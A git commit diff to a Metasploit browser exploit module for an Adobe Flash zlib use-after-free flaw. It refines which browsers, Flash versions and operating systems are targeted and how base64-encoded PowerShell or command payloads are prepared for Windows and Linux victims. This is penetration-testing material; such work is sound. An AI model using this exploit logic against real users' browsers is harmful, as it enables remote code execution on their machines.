Use all the BES power

jvazquez-r7 · jvazquez-r7 · commit b9f9647ab1bb · 2015-05-21T14:06:41.000-05:00
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -45,16 +45,31 @@ def initialize(info={})
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
+          :arch    => ARCH_X86,
           :os_name => lambda do |os|
               os =~ OperatingSystems::Match::LINUX ||
               os =~ OperatingSystems::Match::WINDOWS_7
             end,
-          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
           :flash   => lambda do |ver|
-              (ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) ||
-                (ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438'))
-            end,
-          :arch    => ARCH_X86
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')
+            end
+
+            false
+          end
         },
       'Targets'             =>
         [
@@ -97,13 +112,14 @@ def on_request_exploit(cli, request, target_info)
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    target_payload = get_payload(cli, target_info)
 
     if target.name =~ /Windows/
+      target_payload = get_payload(cli, target_info)
       psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
       b64_payload = Rex::Text.encode_base64(psh_payload)
       platform_id = 'win'
     elsif target.name =~ /Linux/
+      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
       b64_payload = Rex::Text.encode_base64(target_payload)
       platform_id = 'linux'
     end
